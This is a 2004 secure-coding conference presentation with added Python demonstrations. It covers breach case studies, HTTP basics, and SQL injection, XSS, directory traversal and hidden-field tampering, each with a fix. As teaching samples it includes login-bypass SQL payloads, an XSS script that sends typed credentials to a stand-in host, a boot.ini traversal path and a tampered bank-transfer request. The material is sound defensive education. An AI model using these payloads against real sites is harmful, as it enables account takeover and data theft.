BIO PRESENTATION

Better Software Conference & EXPO, September 27-30, 2004, San Jose, CA USA

T16, September 30, 2004, 3:00 PM

DEVELOPING SECURE WEB APPLICATIONS

Dennis Hurst, SPI Dynamics Inc

Dennis Hurst, senior consulting engineer for SPI Dynamics, is responsible for working with developers to educate them on the need for Web Application security and practical ways to protect Web Applications from hacking attacks.

With more than 15 years experience in the Information Systems/Application development industry, he is an expert in system design, implementation and maintenance of complex multi-vendor, multi-platform computer applications and networks. He has extensive experience in planning, developing and enhancing Internet systems as well as integrating Internet systems with legacy systems. For the past three years he has focused on developing tools to test and secure the HTTP protocol.

Dennis is a Microsoft Certified Solution Developer (MCSD in Visual Basic and SQL Server) and a Certified Novell Engineer (CNE) for version 3.x and 4.x. Furthermore, he has published articles and developed classes on the secure application development process. Dennis has spoken on the topic of secure coding practices at Software Development West 2004, WebSec 2003 and various user group chapter meetings. He has been published in asp.net PRO and on http://www.15seconds.com/Issue/000612.htm.

Hacker Exploits, Coding Best Practices and Automated Code Testing Tools

Developing Secure Web Applications

Agenda

PART 1: Introductions

PART 2: What is Web Application Security?

PART 3: Web Application Hacks & Application Risks

PART 4: Web Applications and HTTP 101

PART 5: Web Application Attacks

PART 6: Managing & Detecting Vulnerabilities

SPI Dynamics

SPI Dynamics delivers security products and services that protect enterprises at the web application layer. These products are backed by the industry’s leading security experts, SPI Labs.

WebInspect is our industry leading web application security assessment product line and is licensed to enterprises, consultants, and other institutions, both directly and via global partners.

The Expert in Web Application Security Assessment

SPI Dynamics believes that security must be implemented across the application lifecycle. The earlier a security defect is detected the less it will ultimately cost an organization.

SPI Dynamics is dedicated to maintaining a leadership position in vulnerability assessment and we truly measure our success through the success of our customers.


PART 2

What is Web Application Security?

The evolution from web sites to web applications. Where does the risk come from?

Web Sites (diagram): Browser <-> Web Server (HTML). Simple, single server solutions.

Web Applications (diagram labels): Browser, Wireless, Web Services; Web Servers (Presentation Layer, Media Store); Application Server (Business Logic, Content Services); Database Server (Customer Identification, Access Controls, Transaction Information, Core Business Data). Very complex architectures, multiple platforms, multiple protocols.

Web Applications Invite Public Access

“Today over 70% of attacks against a company’s website or web application come at the ‘Application Layer’ not the Network or System layer.”

- Gartner

Web Applications Breach the Perimeter

(Diagram: INTERNET -> DMZ -> TRUSTED INSIDE -> CORPORATE INSIDE. HTTP(S) passes through every segment; FTP, TELNET, IMAP, SSH and POP3 are shown as the services the firewall does not pass.)

Firewall only allows PORT 80 (or 443 SSL) traffic from the Internet to the web server.
Any -> Web Server: 80

Firewall only allows applications on the web server to talk to the application server.
Web Server -> Application Server

Firewall only allows the application server to talk to the database server.
Application Server -> Database

Web servers: IIS, SunOne, Apache. Application platforms: ASP.NET, WebSphere, Java. Databases: SQL, Oracle, DB2.

PART 3

Web Application Hacks and Application Risks

• Who got hacked?
• How they got hacked, what method was used?
• What was the result of being hacked?
• Why web application risks occur
• Web application vulnerabilities

Web Application Risk

“Web application incidents cost companies more than $320,000,000 in 2001.”

Forty-four percent (223 respondents) to the 2002 Computer Crime and Security Survey were willing and/or able to quantify their financial losses. These 223 respondents reported $455,848,000 in financial losses.

“2002 Computer Crime and Security Survey”

Computer Security Institute & San Francisco FBI Computer Intrusion Squad

Ziff Davis, hacked August 2002

Ziff Davis Media has agreed to revamp its website's security and pay affected customers $500 each after lax security exposed the personal data of thousands of subscribers last year. The agreement between Ziff Davis -- publisher of PC Magazine and other tech titles, including a slew of gaming magazines -- and attorneys general from New York, Vermont and California came after web surfers discovered an unprotected data file on Ziff Davis' site in November. The file contained names, addresses, e-mail addresses -- and, in some instances, credit card numbers -- of 12,000 people who signed up for a special promotion to receive Electronic Gaming Monthly magazine.

Recent Web Application Hack Example

Recent Web Application Hacks

Victoria's Secret, November 27, 2002

A vulnerability at the Victoria's Secret web site allowed customers who purchased items there to view other customers' orders. By simply changing the data in the URL address line the web application was manipulated. $50,000 fine and publicity in 2003.

Victoria’s Secret

Recent Web Application Hacks

January 3, 2003

RIAA was hacked 8 times in 6 months. The 6th time the RIAA site was hacked, downloadable, pirated music was posted. This time, a URL allowing access to the RIAA's system for posting press releases was made publicly accessible, allowing people to post messages that then appeared on the RIAA's official press release page.

Recording Industry Association of America

Sept 25th 2003: Car Shoppers Credit Details Exposed in Bulk

An administrative page was not properly secured, so any personal loan application information could be viewed. Over 1,000 shoppers from multiple websites had their entire financial history exposed on a public site.

The researcher simply read the HTML comments, saw the filename, and typed it into his browser.

“The exposure of personal financial information could also put Dealerskins and its customers afoul of Federal Trade Commission (FTC) regulations “

Gateway Computers

Wall Street Journal Article “More Scary Tales Involving Big Holes in Website Security”, by Lee Gomes, February 2nd 2004

Gateway’s website stored an ID number in a cookie to identify you when returning to the site. By changing this ID number, you are able to view the information of other shoppers. Information viewable includes Name, Address, Phone Number, Order History, Last Four Digits of Credit Card, Credit Card Expiration Date, Credit Card Verification Code.

Federal Trade Commission investigates Guess Inc.

“Guess Settles with FTC over Cyber Security Snafu”, June 2003 by Kevin Poulson for SecurityFocus

“ Guess.com was open to an "SQL injection attack," permitting anyone able to construct a properly-crafted URL to pull down every name, credit card number and expiration date in the site's customer database -- over 200,000 in all …The episode prompted a year-long FTC investigation into alleged deceptive trade practices by Guess “

"Consumers have every right to expect that a business that says it's keeping personal information secure is doing exactly that," said Howard Beales, Director of the FTC's consumer protection bureau, in a press release. "It's not just good business, it's the law."

Other Hacked Websites

• Tiffany.com - 2004, SQL injection
• OpenTable.com - non-random identifiers
• Saks Fifth Avenue - non-random identifiers
• FTD.com - February 14, 2003, sequential cookies (Source: CNET News, "FTD Hole Leaks Personal Information")
• Travelocity - January 22, 2001, open directory (Source: CNET News, "Travelocity Exposes Customer Information")
• Creditcards.com - December 12, 2000, SQL injection (Source: CNET News, "Company says extortion try exposes thousands of card numbers")
• CD Universe - January 9, 2000, SQL injection (Source: Internetnews.com, "Failed Blackmail Attempt Leads to Credit Card Theft")
• MasterCard - February 17, 2003, partner liability
• Tower Records - December 5, 2002, access permissions

The Web Application Security Gap

Security Professionals Don't Know The Applications

Application Developers and QA Professionals Don't Know Security

Why Web Application Risks Occur

Developers Are Not Security Professionals
• Application development stresses functionality, not security
• Lack of awareness of security issues in development
• Lack of effective testing tools in Development & QA
• Resource constrained development teams

Security Professionals Are Not Developers
• Lack of awareness of application vulnerabilities in security teams
• Lack of effective testing tools
• Certification and accreditations don't examine the web application
• Development cycle missing from security procedures and audits
• Security scrutinizes the desktop, the network, and the server. The web application is missing.

Web Application Vulnerabilities

Web application vulnerabilities occur in multiple areas.

Platform: Known Vulnerabilities

Administration: Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing

Application: Parameter Manipulation, Cross-Site Scripting, SQL Injection, Buffer Overflow, Reverse Directory Traversal, Java Decompilation, Path Truncation, Hidden Web Paths, Cookie Manipulation, Application Mapping, Backup Checking, Directory Enumeration

Platform: Known Vulnerabilities

• Known vulnerabilities can be exploited immediately with a minimum amount of skill or experience ("script kiddies")
• Most easily defendable of all web vulnerabilities
• MUST have streamlined patching procedures
• MUST have inventory process

Web Application Vulnerabilities

Administration: Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing

• Less easily corrected than known issues
• Require increased awareness
• More than just configuration, must be aware of security flaws in actual content
• Remnant files can reveal applications and versions in use
• Backup files can reveal source code and database connection strings

Web Application Vulnerabilities

Application Programming:

• User input is not examined from a security perspective.
• Unexpected code
• Error messages ...

Application: Parameter Manipulation, Cross-Site Scripting, SQL Injection, Buffer Overflow, Reverse Directory Traversal, Java Decompilation, Path Truncation, Hidden Web Paths, Cookie Manipulation, Application Mapping, Backup Checking, Directory Enumeration

PART 4

Web Applications and HTTP 101

• What are the components of a web application?
• How are these components secured?
• How does HTTP (the web) work?
• How does a hacker see your application?

The OSI Reference Model

Layer 1 Physical, Layer 2 Datalink, Layer 3 Network, Layer 4 Transport, Layer 5 Session, Layer 6 Presentation, Layer 7 Application.

Layers 1 through 6 deal with how data is delivered; network / OS / service attacks happen here.

Layer 7 deals with business logic (content and interpretation); web based attacks (HTTP/HTTPS) happen here.

What is a Web-Based Application?

• What is the data path (Network) for web applications?
• How does a web-based application work (HTTP)?
• How does your application work?

(Diagram: the three layers examined in this part, from the bottom up: Network, HTTP, Web Application.)

How Do Web Applications Communicate?

Network Layer

• Client connects to the server
• Client sends request to server
• Server responds to client
• Connection is disconnected

HTTP is stateless

(Diagram: Client PC (10.1.0.123) sends a Request to Server www.mybank.com (64.58.76.230), port 80, and receives a Response.)

Securing the Network Layer: SSL (Secure Sockets Layer)

• Provides encryption of data between a client and server.
• Typically guarantees to the client that the server is who it asserts itself to be (the server presents a certificate; the client is usually not authenticated).

(Diagram: Client PC (10.1.0.123) <-> SSL Tunnel <-> Server www.mybank.com (64.58.76.230), port 443.)

Securing the Network Layer: Firewalls

• Allow or disallow traffic to pass from the external network to the internal network.
• Act as a "traffic cop".
• Port 80 (HTTP) and port 443 (HTTPS) travel freely through the firewall.

Securing the Network Layer: IDS (Intrusion Detection System)

• Monitors the network for malicious activities.
• Typically signature based detection (similar to virus protection).
• Blind to encrypted (SSL) traffic, so an attack carried over HTTPS passes the firewall and the IDS unseen.

(Diagram: Client PC (10.1.0.123) <-> SSL Tunnel, watched by an IDS, <-> Server www.mybank.com (64.58.76.230), port 443.)

What is HTTP?

HTML Page: <a href=http://www.test.me>Click Here</a>

Request (Client PC -> Server):

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)
Host: www.spidynamics.com
Connection: Keep-Alive

Response (Server -> Client PC):

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 07 Apr 2003 12:52:26 GMT
Content-Length: 10225
Content-Type: text/html
Cache-control: private
Set-Cookie: ASPSESSIONIDCSCRRCBS=GODPKFJDPJNMHGGJDOEIDDMK; path=/;

<html><body>

How Does Your Application Work?

• GET – Simple query string based request
• POST – Contains POST data in the body of the request.

HTTP – GET With a Query String

HTML Page: <a href=http://www.test.me/banklogin.asp?serviceName=FreebankCaastAccess&ID=5 >Click Here</a>

Request:

GET /banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&ID=5 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)
Host: www.company.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN

Response:

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 04 Apr 2003 15:17:50 GMT
Content-Length: 4183
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=25; path=/;
Set-Cookie: state=GA; path=/;
Set-Cookie: username=MrUser; path=/;
Set-Cookie: userid=1538; path=/;

<HTML><HEAD><TITLE></TITLE></HEAD><BODY>

HTTP – POST With POST Data

Form:

<FORM ACTION="login1.asp" METHOD="POST"><br>Username:<INPUT TYPE="text" NAME="login"><BR>Password:<INPUT TYPE="password" NAME="password" ><BR><INPUT TYPE="submit"><BR></FORM>

Request:

POST /login1.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,*/*
Referer: http://www.company.com/banklogin.asp?serviceName=FreebankCaastAccess
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)
Host: www.company.com
Content-Length: 23
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN; sessionid=25; state=GA; ...

login=John&password=Doe

Response:

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 04 Apr 2003 15:35:00 GMT
Content-Length: 80
Content-Type: text/html
Cache-control: private

<html><body>Welcome John. ...</body></html>
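The slides make the point that every part of a request is chosen by the client. As an added example (not code from the presentation), the Python below parses the GET and POST requests shown above and enumerates the values the server must treat as user input. The two raw requests are constructed from the slides' exchanges with the header set abbreviated; host, path, query, cookie and body values are the ones on the slides.

```python
# Added example (not from the slides): parse a raw HTTP request and list
# every value the client controls. The two requests are constructed from the
# GET (banklogin.asp) and POST (login1.asp) exchanges shown above; the header
# set is abbreviated but the host, query, cookie and body values are the same.
from urllib.parse import parse_qs, urlsplit

RAW_GET = (
    "GET /banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&ID=5 HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)\r\n"
    "Host: www.company.com\r\n"
    "Cookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN\r\n"
    "\r\n"
)

RAW_POST = (
    "POST /login1.asp HTTP/1.1\r\n"
    "Referer: http://www.company.com/banklogin.asp?serviceName=FreebankCaastAccess\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: www.company.com\r\n"
    "Content-Length: 23\r\n"
    "Cookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN; sessionid=25; state=GA\r\n"
    "\r\n"
    "login=John&password=Doe"
)


def parse_cookies(header: str) -> dict:
    """Split a Cookie header ('a=1; b=2') into a dict; a pair without '=' keeps an empty value."""
    cookies = {}
    for pair in header.split(";"):
        pair = pair.strip()
        if not pair:
            continue
        name, _, value = pair.partition("=")
        cookies[name.strip()] = value.strip()
    return cookies


def parse_request(raw: str) -> dict:
    """Break a raw request into the pieces the server will act on."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)

    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()

    url = urlsplit(target)
    query = parse_qs(url.query, keep_blank_values=True)

    # Only read as many body characters as the client declared; anything
    # beyond that belongs to the next request on a keep-alive connection.
    declared = int(headers.get("content-length", "0"))
    form = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        form = parse_qs(body[:declared], keep_blank_values=True)

    return {
        "method": method,
        "version": version,
        "path": url.path,
        "query": query,
        "headers": headers,
        "cookies": parse_cookies(headers.get("cookie", "")),
        "form": form,
    }


def attack_surface(req: dict) -> list:
    """Everything in a request is user input: name each value the server must validate."""
    surface = [("path", req["path"])]
    surface += [("query", name) for name in req["query"]]
    surface += [("cookie", name) for name in req["cookies"]]
    surface += [("form", name) for name in req["form"]]
    # Headers too: Referer, User-Agent and Host are set by the client and are
    # often logged or echoed into pages without validation.
    surface += [("header", name) for name in req["headers"] if name != "cookie"]
    return surface


if __name__ == "__main__":
    for raw in (RAW_GET, RAW_POST):
        req = parse_request(raw)
        print(req["method"], req["path"])
        for kind, name in attack_surface(req):
            print("   ", kind, name)
```

Note that the POST carries three cookies (sessionid, state and the ASP session ID) besides its two form fields, and that sessionid=25 and userid=1538 in the earlier response are small integers set by the server and returned by the client, which is exactly the kind of value the later Gateway and FTD incidents turned on.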

PART 5

Web Application Attacks

Questions
• Define – What is it and what is at stake?
• Result – How does it happen?
• Fix – How to fix web application vulnerabilities?

Types of Attacks
• SQL Injection
• Cross Site Scripting (XSS)
• Directory Traversal
• Hidden parameters

SQL Injection – Defined

SQL injection is a technique for exploiting web applications that build SQL queries from client-supplied data, so that the data is interpreted as part of the SQL command rather than as a value. Stripping "harmful" characters from the input is not a reliable defense; separating the data from the query (parameterized queries) is.

SQL Injection – Simple Example

'
' Login SQL Statement (vulnerable: the form fields are concatenated into the query text)
'
SQLtemp = "SELECT * FROM Users " & _
          "WHERE userID = '" & Request.Form("username") & "' " & _
          "and pass = '" & Request.Form("password") & "'"

Set rs = Apples.Execute(SQLtemp)   ' Apples is the page's open ADO connection
If Not rs.EOF Then
    ' Successful login!!
    ...
End If

SQL Injection – Simple Example

(Screenshot: the SQL example and the returned response.)

SQL Injection – Simple Example

What the hacker knows:
• The web page is creating a SQL statement that takes two parameters.
• The parameters are both strings.
• The parameters are, most likely, being passed to the database unfiltered.

The hacker can now guess that the SQL statement looks something like this:

Select <something> from <sometable> where <fieldone> = '<user input one>' And <fieldtwo> = '<user input two>'

The hacker can now start making educated guesses. Submitting ' or 1=1 or 'a' =' in both fields turns the statement into:

Select <something> from <sometable> where <fieldone> = '' or 1=1 or 'a' ='' And <fieldtwo> = '' or 1=1 or 'a' =''

Because 1=1 is always true, the WHERE clause matches every row and the login succeeds without a valid password.

SQL Injection – Simple Example

(Screenshot: the SQL example with the injected input.)

SQL Injection – Solution

• Use parameterized queries
• Trap your errors!!! Don't let the environment
• Use stored procedures
• Validate user input
• Turn off default error messages

using (SqlConnection cnn = new SqlConnection("...database connection information here..."))
using (SqlCommand cmd = new SqlCommand(
        "SELECT FirstName, LastName FROM Users "
        + "WHERE UserName = @uid AND password = @passwd", cnn))
{
    // The values are bound as typed parameters, never concatenated into the SQL text
    cmd.Parameters.Add("@uid", SqlDbType.VarChar, 100).Value = uid;
    cmd.Parameters.Add("@passwd", SqlDbType.VarChar, 100).Value = passwd;
    cnn.Open();
    bool loggedIn = cmd.ExecuteScalar() != null;   // a row came back: successful login
}
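To make the attack and the fix concrete, here is an added example (not code from the presentation) that runs the slides' concatenated login query and its parameterized replacement against an in-memory SQLite database. The Users table, its two rows and the "alice'--" payload are constructed here; the ' or 1=1 or 'a' =' payload is the one from the slide.

```python
# Added example (not code from the slides): the slides' concatenated login
# query beside its parameterized replacement, run against an in-memory SQLite
# database. The Users table, its two rows and the "alice'--" payload are
# constructed here; "' or 1=1 or 'a' ='" is the payload from the slide.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a Users table with the slides' column names."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (userID TEXT, pass TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def build_vulnerable_sql(username: str, password: str) -> str:
    """Same construction as the VBScript: user input spliced into the SQL text."""
    return ("SELECT * FROM Users WHERE userID = '" + username
            + "' and pass = '" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    sql = build_vulnerable_sql(username, password)
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same query with placeholders: the driver passes the values separately,
    so quotes, comment markers and keywords inside them are just characters."""
    sql = "SELECT * FROM Users WHERE userID = ? and pass = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


SLIDE_PAYLOAD = "' or 1=1 or 'a' ='"   # from the slide: makes the WHERE clause always true
TARGETED_PAYLOAD = "alice'--"           # constructed: '--' comments out the password check


def demo() -> dict:
    """Each key says which login routine ran and what was submitted; the value is 'logged in?'."""
    conn = make_db()
    return {
        "vuln_valid_creds": login_vulnerable(conn, "alice", "s3cret"),
        "vuln_wrong_password": login_vulnerable(conn, "alice", "nope"),
        "vuln_slide_payload": login_vulnerable(conn, SLIDE_PAYLOAD, SLIDE_PAYLOAD),
        "vuln_targeted_payload": login_vulnerable(conn, TARGETED_PAYLOAD, "nope"),
        "safe_valid_creds": login_parameterized(conn, "alice", "s3cret"),
        "safe_slide_payload": login_parameterized(conn, SLIDE_PAYLOAD, SLIDE_PAYLOAD),
        "safe_targeted_payload": login_parameterized(conn, TARGETED_PAYLOAD, "nope"),
    }


if __name__ == "__main__":
    print(build_vulnerable_sql(SLIDE_PAYLOAD, SLIDE_PAYLOAD))
    for name, result in demo().items():
        print(f"{name:24} -> {'logged in' if result else 'rejected'}")
```

The targeted payload shows why the problem is not just "always true" clauses: with a username of alice'-- the attacker logs in as a chosen account, and no amount of password checking after the query helps. Note also that sqlite3's execute() refuses stacked statements (a second statement after a semicolon), which is a property of that driver, not of the technique; other drivers will happily run them.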

Cross Site Scripting (XSS)

Cross-site scripting (also known as XSS or CSS) occurs when dynamically generated web pages display input that is not properly validated. A user passes input in the form of a parameter to the web server. The web server returns the user provided input back to the user without proper encoding, so the browser runs it as part of the page.

http://www.freebank.com/banklogin.asp?err=Invalid%20Login:%20<script>alert(document.cookie)</script>

Cross Site Scripting (XSS)

HTML (the login form the injected script runs inside):

<input type=text name=txtUserID ...>
<input type=text name=txtPassword ...>

XSS JavaScript (injected into the page; sends the typed credentials as part of an image URL):

var oImg = new Image;
oImg.src = "http://www.test.me/"
    + document.frmTest.txtUserID.value + "."
    + document.frmTest.txtPassword.value;

Web Log (the image request carries the credentials in the URL):

.... 127.0.0.1 GET /test/xss.asp 200
.... 127.0.0.1 GET /MyUserID.MyPassword 404
.... 127.0.0.1 GET /test/xss.asp 200

Cross Site Scripting (XSS) - Solution

HTML Encode all data before it is RETURNED to a user's web browser:
• Data that comes from a user
• Data that comes from a database
• Data that comes from any dynamic source

Server.HTMLEncode provides this functionality.

Validate user input.
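As an added example (not code from the presentation), the Python below renders the banklogin.asp?err= reflection from the slide raw and then through the Server.HTMLEncode-style fix, using Python's html.escape in place of the ASP call. The page template, a second payload aimed at an attribute value, and the parser that inspects the result are constructed here; the script payload and the URL are the slide's.

```python
# Added example (not from the slides): the banklogin.asp?err= reflection from
# the XSS slide, rendered raw and then through the Server.HTMLEncode-style fix
# (Python's html.escape). The page template, the attribute-context payload and
# the parser that checks the result are constructed here; the script payload
# and URL are the slide's.
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

SLIDE_URL = ("http://www.freebank.com/banklogin.asp?err=Invalid%20Login:"
             "%20<script>alert(document.cookie)</script>")
# Constructed: a payload aimed at an attribute value rather than page text.
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def err_from_url(url: str) -> str:
    """What Request.QueryString("err") would hand the page."""
    return parse_qs(urlsplit(url).query)["err"][0]


def render(err: str, last_user: str, encode: bool) -> str:
    """Login page that echoes two dynamic values: the error text (HTML text
    context) and the previously entered user ID (quoted attribute context)."""
    if encode:
        err = html.escape(err, quote=True)
        last_user = html.escape(last_user, quote=True)
    return ("<html><body><form name=\"frmTest\">"
            "<p class=\"error\">" + err + "</p>"
            "<input type=\"text\" name=\"txtUserID\" value=\"" + last_user + "\">"
            "<input type=\"password\" name=\"txtPassword\">"
            "</form></body></html>")


class ScriptFinder(HTMLParser):
    """Counts <script> tags and on* event-handler attributes as a browser would parse them."""

    def __init__(self):
        super().__init__()
        self.scripts = 0
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        for name, value in attrs:
            if name.startswith("on"):
                self.handlers.append((name, value))


def active_content(page: str) -> dict:
    finder = ScriptFinder()
    finder.feed(page)
    return {"scripts": finder.scripts, "handlers": finder.handlers}


def demo() -> dict:
    err = err_from_url(SLIDE_URL)
    return {
        "raw": active_content(render(err, ATTR_PAYLOAD, encode=False)),
        "encoded": active_content(render(err, ATTR_PAYLOAD, encode=True)),
    }


if __name__ == "__main__":
    for mode, found in demo().items():
        print(mode, found)
```

Encoding with quotes escaped covers both the text context and the quoted attribute context shown here; it is not the right encoding for a value written into a JavaScript block or a URL, which need their own encoders.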

Directory Traversal – Result

This is a standard site that shows a list of available documents in the FAQ folder.

Directory Traversal – Result

Clicking on one of the links shows the selected document. Notice the parameter ?Template=Check+Card%2Etxt. When you URL decode that parameter it will look like:

?Template=Check Card.txt

This could be a file name.

Directory Traversal – Result

Changing the Template parameter to ../../../../../boot.ini opened the boot.ini file. A hacker now has read access to any file on the hard drive that the web server's process account can read.

Directory Traversal – The Code

The vulnerable code:

sFile = Request("Template")                ' Get the parameter
If sFile <> "" Then                        ' User passed a parameter
    If fso.FileExists(sDir & "\" & sFile) Then
        Set oStream = fso.OpenTextFile(sDir & "\" & sFile, 1, False)
    End If
End If

Secure version of the code:

sFile = Request("Template")                ' Get the parameter

' Quick security check: reject anything that is not a letter, digit or dot
Set re = New RegExp
re.Pattern = "[^a-zA-Z0-9.]"
If re.Test(sFile) Then                     ' Look for invalid characters
    sFile = ""                             ' Looks odd, don't accept it
End If

If sFile <> "" Then                        ' User passed a parameter
    If fso.FileExists(sDir & "\" & sFile) Then
        Set oStream = fso.OpenTextFile(sDir & "\" & sFile, 1, False)
    End If
End If

Directory Traversal - Fix

• Avoid using a parameter as a file name.
• When using a parameter as a file name use EXTREME caution to ensure that the name passed in is a valid file name and is not trying to reference a file in a parent folder.
• Limit the web server to only access appropriate folders on the web server and not parent folders outside the web site file structure.
• ...and... validate user input
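The following is an added example (not code from the presentation) of the Template=<file> handler from these slides in Python, first as written (join the name to the folder and open it) and then with two checks: an allowlist on the name and a realpath check that the resolved file is still inside the FAQ folder. The folder layout, the "Check Card.txt" content, the boot.ini stand-in and a symlink planted inside the folder are constructed in a temporary directory.

```python
# Added example (not from the slides): the Template=<file> handler from the
# directory traversal slides, first as written (join and open) and then with
# two checks: an allowlist on the name and a realpath check that the resolved
# file is still inside the FAQ folder. The folder layout, the "Check Card.txt"
# content, the boot.ini stand-in and the symlink are constructed here.
import os
import re
import tempfile

# Letters, digits, space, dot, underscore and hyphen; no slashes of either kind.
SAFE_NAME = re.compile(r"^[A-Za-z0-9 ._-]+$")


def make_tree() -> tuple:
    """Constructed layout: <root>/boot.ini (outside the site), <root>/site/faq/Check Card.txt,
    and <root>/site/faq/link.txt -> <root>/boot.ini where symlinks are available."""
    root = os.path.realpath(tempfile.mkdtemp())
    faq = os.path.join(root, "site", "faq")
    os.makedirs(faq)
    with open(os.path.join(faq, "Check Card.txt"), "w") as fh:
        fh.write("How to use your check card ...\n")
    with open(os.path.join(root, "boot.ini"), "w") as fh:
        fh.write("[boot loader]\n")
    try:
        os.symlink(os.path.join(root, "boot.ini"), os.path.join(faq, "link.txt"))
    except (OSError, NotImplementedError):
        pass
    return root, faq


def read_template_vulnerable(faq_dir: str, template: str):
    """The slide's code: whatever name arrives is joined to the folder and opened."""
    path = os.path.join(faq_dir, template)
    if not os.path.isfile(path):
        return None
    with open(path) as fh:
        return fh.read()


def read_template_safe(faq_dir: str, template: str):
    """Reject odd names, then prove the resolved path is still under faq_dir."""
    if not SAFE_NAME.match(template):
        return None                                   # looks odd, don't accept it
    base = os.path.realpath(faq_dir)
    path = os.path.realpath(os.path.join(base, template))
    # The realpath check catches what the allowlist alone misses: ".." is made
    # of allowed characters, and a symlink inside the folder can point outside it.
    try:
        inside = os.path.commonpath([base, path]) == base
    except ValueError:                                # different drives on Windows
        inside = False
    if not inside or not os.path.isfile(path):
        return None
    with open(path) as fh:
        return fh.read()


def demo() -> dict:
    """For each attempt: did the vulnerable handler open a file, did the safe one?"""
    root, faq = make_tree()
    attempts = {
        "legit": "Check Card.txt",
        "traversal": "../../boot.ini",
        "dotdot_only": "..",
        "absolute": os.path.join(root, "boot.ini"),
        "symlink": "link.txt",
    }
    return {
        name: {"vulnerable": read_template_vulnerable(faq, t) is not None,
               "safe": read_template_safe(faq, t) is not None}
        for name, t in attempts.items()
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Two practical caveats follow from running this. The slide's own pattern [^a-zA-Z0-9.] rejects a space, so it would also reject the slide's legitimate "Check Card.txt"; an allowlist has to be written to the real naming convention. And an allowlist cannot reason about the file system, so the containment check on the resolved path is the part that actually stops symlinks and "..", and the process account's file permissions (the slide's third bullet) are the backstop when both are bypassed.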

Hidden Parameters

Hidden parameters allow developers to pass variables to and from a web browser in the same way other <input> tags do, however they are not seen by the end user.

The format is <input type=hidden name=myname value=myvalue>

The primary danger in using hidden parameters is that they can be modified by a hacker and are seldom tested during the development and QA process.

Hidden Parameters - Example


Hidden Parameters – The Hack

Request before the hack:

POST /BankSite/xferconfirm.asp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://www.nubank.me/BankSite/acctxfer.asp
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; (R1 1.3); .NET CLR 1.0.3705)
Host: www.nubank.me
Content-Length: 103
Connection: Close
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCDCDBRB=AJPFJELCAAEFJOPKCAJFIFBM

fromAcct=120199789890&toAcct=18822281934&amount=2000.00&memo=From+HE+to+IC&Enter=Preview+Transfer

Request after the hack (only the hidden fromAcct value has changed):

POST /BankSite/xferconfirm.asp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://www.nubank.me/BankSite/acctxfer.asp
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; (R1 1.3); .NET CLR 1.0.3705)
Host: www.nubank.me
Content-Length: 103
Connection: Close
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCDCDBRB=AJPFJELCAAEFJOPKCAJFIFBM

fromAcct=44797501008896675&toAcct=18822281934&amount=2000.00&memo=From+HE+to+IC&Enter=Preview+Transfe


Hidden Parameters – The Fix

• Never assume a hidden parameter has not been tampered with by the end user.
• Never put secure information in a hidden parameter.
• Ensure that proper QA testing of all hidden parameters is done prior to going live with any application.
• Add proper hidden parameter use guidelines to development methodology documents and processes.
• ...and again... validate user input

The fix – Trust but verify

• Validate ALL user input
• Validate every time you use user input
• Everything in a request is "user input"
